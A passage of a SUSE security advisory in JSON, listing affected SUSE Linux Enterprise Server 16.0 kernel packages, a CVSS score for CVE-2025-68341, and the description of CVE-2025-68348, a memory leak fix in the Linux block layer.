"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68341"
},
{
"cve": "CVE-2025-68348",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68348"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: fix memory leak in __blkdev_issue_zero_pages\n\nMove the fatal signal check before bio_alloc() to prevent a memory\nleak when BLKDEV_ZERO_KILLABLE is set and a fatal signal is pending.\n\nPreviously, the bio was allocated before checking for a fatal signal.\nIf a signal was pending, the code would break out of the loop without\nfreeing or chaining the just-allocated bio, causing a memory leak.\n\nThis matches the pattern already used in __blkdev_issue_write_zeroes()\nwhere the signal check precedes the allocation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
